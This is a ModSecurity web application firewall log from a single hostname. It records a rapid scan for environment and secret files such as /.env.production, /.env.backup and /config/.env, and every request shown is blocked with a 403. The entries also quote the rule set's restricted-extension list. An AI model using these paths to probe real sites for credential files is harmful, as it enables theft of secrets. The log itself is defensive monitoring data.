[Fri Mar 20 15:01:16.088068 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "ab1TLEGu3yPOFBRkxZtwwAAAAAA"]
[Fri Mar 20 15:01:16.088180 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "ab1TLEGu3yPOFBRkxZtwwAAAAAA"]
[Fri Mar 20 15:01:16.088299 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "ab1TLEGu3yPOFBRkxZtwwAAAAAA"]
[Fri Mar 20 15:01:16.091990 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "ab1TLEnH70iMTzyPh3kWigAAAAY"]
[Fri Mar 20 15:01:16.092126 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "ab1TLEnH70iMTzyPh3kWigAAAAY"]
[Fri Mar 20 15:01:16.092191 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "ab1TLGLvrbuE12wYiLe4LAAAABA"]
[Fri Mar 20 15:01:16.092216 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "ab1TLEnH70iMTzyPh3kWigAAAAY"]
[Fri Mar 20 15:01:16.092298 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "ab1TLGLvrbuE12wYiLe4LAAAABA"]
[Fri Mar 20 15:01:16.092321 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "ab1TLEnH70iMTzyPh3kWigAAAAY"]
[Fri Mar 20 15:01:16.092423 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "ab1TLGLvrbuE12wYiLe4LAAAABA"]
[Fri Mar 20 15:01:16.113113 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "ab1TLEnH70iMTzyPh3kWiwAAAAY"]
[Fri Mar 20 15:01:16.113264 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "ab1TLEnH70iMTzyPh3kWiwAAAAY"]
[Fri Mar 20 15:01:16.113380 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "ab1TLEnH70iMTzyPh3kWiwAAAAY"]
[Fri Mar 20 15:01:16.113496 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "ab1TLEnH70iMTzyPh3kWiwAAAAY"]
[Fri Mar 20 15:01:16.115576 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "ab1TLGLvrbuE12wYiLe4LQAAABA"]
[Fri Mar 20 15:01:16.115692 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "ab1TLGLvrbuE12wYiLe4LQAAABA"]
[Fri Mar 20 15:01:16.115804 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "ab1TLGLvrbuE12wYiLe4LQAAABA"]
[Fri Mar 20 15:01:16.115885 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.tmp"] [unique_id "ab1TLJJiwBXnNifSr5vepQAAAAQ"]
[Fri Mar 20 15:01:16.115977 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.tmp"] [unique_id "ab1TLJJiwBXnNifSr5vepQAAAAQ"]
[Fri Mar 20 15:01:16.116085 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.tmp"] [unique_id "ab1TLJJiwBXnNifSr5vepQAAAAQ"]
[Fri Mar 20 15:01:16.121767 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "ab1TLPy1_WiwY9KfWu_4vgAAAAI"]
[Fri Mar 20 15:01:16.121879 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "ab1TLPy1_WiwY9KfWu_4vgAAAAI"]
[Fri Mar 20 15:01:16.121989 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "ab1TLPy1_WiwY9KfWu_4vgAAAAI"]
[Fri Mar 20 15:01:16.124001 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "ab1TLG8zubx8zfwe9oW5NQAAAAU"]
[Fri Mar 20 15:01:16.124099 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "ab1TLG8zubx8zfwe9oW5NQAAAAU"]
[Fri Mar 20 15:01:16.124204 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "ab1TLG8zubx8zfwe9oW5NQAAAAU"]
[Fri Mar 20 15:01:16.133075 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "ab1TLKx8_pxqReT7SyGPEwAAAAM"]
[Fri Mar 20 15:01:16.133179 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "ab1TLKx8_pxqReT7SyGPEwAAAAM"]
[Fri Mar 20 15:01:16.133291 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "ab1TLKx8_pxqReT7SyGPEwAAAAM"]
[Fri Mar 20 15:01:16.139496 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1sgAAAAE"]
[Fri Mar 20 15:01:16.139613 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1sgAAAAE"]
[Fri Mar 20 15:01:16.139759 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1sgAAAAE"]
[Fri Mar 20 15:01:16.141992 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "ab1TLEnH70iMTzyPh3kWjAAAAAY"]
[Fri Mar 20 15:01:16.142127 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "ab1TLEnH70iMTzyPh3kWjAAAAAY"]
[Fri Mar 20 15:01:16.142255 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "ab1TLEnH70iMTzyPh3kWjAAAAAY"]
[Fri Mar 20 15:01:16.143441 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "ab1TLEGu3yPOFBRkxZtwwQAAAAA"]
[Fri Mar 20 15:01:16.143531 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "ab1TLEGu3yPOFBRkxZtwwQAAAAA"]
[Fri Mar 20 15:01:16.143641 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "ab1TLEGu3yPOFBRkxZtwwQAAAAA"]
[Fri Mar 20 15:01:16.145797 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "ab1TLGLvrbuE12wYiLe4LgAAABA"]
